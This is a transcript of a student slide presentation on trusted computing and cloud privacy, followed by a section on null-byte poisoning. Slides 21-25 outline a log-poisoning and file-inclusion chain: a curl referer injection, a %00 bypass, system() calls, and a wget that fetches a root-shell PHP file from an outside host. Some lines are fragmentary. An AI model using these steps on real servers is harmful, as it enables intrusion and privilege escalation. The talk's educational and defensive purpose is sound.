Trusted computing and the cloud. UNR – CSE, Jeff Naruchitparames 2 ( and null-byte poisoning attacks for the web )

Presentation transcript:

Trusted computing and the cloud

Slide 2: UNR – CSE, Jeff Naruchitparames (and null-byte poisoning attacks for the web)

Slide 3: Computer architecture. Security... privacy. Digital & physical threats.

Slide 4: 1. Identification – cryptographic. 2. Attestation – digital signatures. 3. Normal operating environment – from the computer's environment (remotely, too!)

Slide 5: (no transcript text)

Slide 6: Control!

Slide 7: Trusted platform module (TPM). Trusted computing group (TCG). Root of trust. Dictate accessibility (permissions) a user has.

Slide 8: But wait! … this is not a bad thing

Slide 9: (no transcript text)

Slide 10: Software as a Service (SaaS). Platform as a Service (PaaS). Infrastructure as a Service (IaaS).

Slide 11: Problem: storage. Solution: encryption, duh! Problem: processing/computation of information. Solution: ???

Slide 12: Without looking!

Slide 13: Blind processing: ensuring security and, in particular, privacy of information from third parties (sysadmins, users, hackers, etc.)

Slide 14: Why so important? ISPs. Power grid owners. Google, Amazon, other web 2.0 companies, etc. Political, economic, competition, etc.

Slide 15: Technical details for another day... Null-byte poisoning attacks (null-byte injection)

Slide 16: Add URL-encoded null-byte characters (%00, 0x00) to user-supplied data. Bypass input sanity-checking filters.

Slide 17: JavaScript, ASP: processing accomplished by C/C++ functions

Slide 18: NULL = string termination or delimiter = stop processing a string = bytes following the delimiter will be ignored

Slide 19: If a string loses its null character, the length of the string is unknown... until the memory pointer finds the next null byte.

Slide 20: /web/htdocs/foo/ Template file includes, yay!
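The mechanism behind slides 16 to 20, as an added example in C that is not part of the presentation: a length-aware filter inspects the whole buffer, the C-string consumer stops at the first NUL, and the hardened check rejects any embedded NUL before applying the rule. The base path, the ".php" suffix rule and the file names are constructed assumptions.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* A length-aware byte buffer, as a web runtime (PHP, ASP, JavaScript)
 * holds user-supplied data: embedded NUL bytes are ordinary content here. */
typedef struct { char data[256]; size_t len; } buf_t;

/* Build base + user + ".php" the length-aware way, carrying any embedded
 * NUL along. Base path and names are constructed for this example. */
bool build_include_path(buf_t *out, const char *base,
                        const char *user, size_t user_len) {
    size_t bl = strlen(base), sl = strlen(".php");
    if (bl + user_len + sl >= sizeof out->data) return false;
    memcpy(out->data, base, bl);
    memcpy(out->data + bl, user, user_len);
    memcpy(out->data + bl + user_len, ".php", sl);
    out->len = bl + user_len + sl;
    out->data[out->len] = '\0';
    return true;
}

/* Naive filter: checks the ".php" suffix over the full length-aware buffer,
 * so it is satisfied even when a NUL sits before the suffix. */
bool naive_suffix_check(const buf_t *p) {
    return p->len >= 4 && memcmp(p->data + p->len - 4, ".php", 4) == 0;
}

/* Length a C-string consumer (fopen, open, include) actually uses: it stops
 * at the first NUL, so everything after it, suffix included, is ignored. */
size_t c_visible_len(const buf_t *p) { return strlen(p->data); }

/* Hardened check: refuse any embedded NUL first, then apply the suffix rule. */
bool hardened_check(const buf_t *p) {
    if (memchr(p->data, '\0', p->len) != NULL) return false;
    return naive_suffix_check(p);
}

int main(void) {
    const char tainted[] = "other\0";   /* constructed: "other" then a NUL */
    buf_t p;
    build_include_path(&p, "/web/htdocs/foo/", tainted, sizeof tainted - 1);
    printf("naive filter: %s, C sees %zu of %zu bytes, hardened: %s\n",
           naive_suffix_check(&p) ? "pass" : "reject",
           c_visible_len(&p), p.len,
           hardened_check(&p) ? "pass" : "reject");
    return 0;
}
```

The same NUL check belongs at the trust boundary of any runtime that hands strings to C-level file or system APIs, since the suffix rule alone is what the slides show being bypassed.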

Slide 21: Inject shellcode via symbolic links from /proc/self/. This example assumes Apache error logs are located in /proc/self/fd/2. Now what?

Slide 22: Note: error logs are typically written without filtering referer variables (from browsers). curl “ -H “Host:” -- referer “ ” [Mon Feb 08 09:27: ] [error] [client x.x.x.x] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /, referer:

Slide 23: d/2%00&cmd=system('pwd') Write issues?! (permissions)

Slide 24: Type d -perm 0777') Assume we find a writable directory at: /home/user/public_html/php_files_for_school/

Slide 25: Injection time! /fd/2%00&cmd=system('wget -O /home/user/public_html/php_files_for_school/homework3.php obtain_root_access/get_root_shell.php'); Privilege escalation

Slide 26: Responsible disclosure! YEAH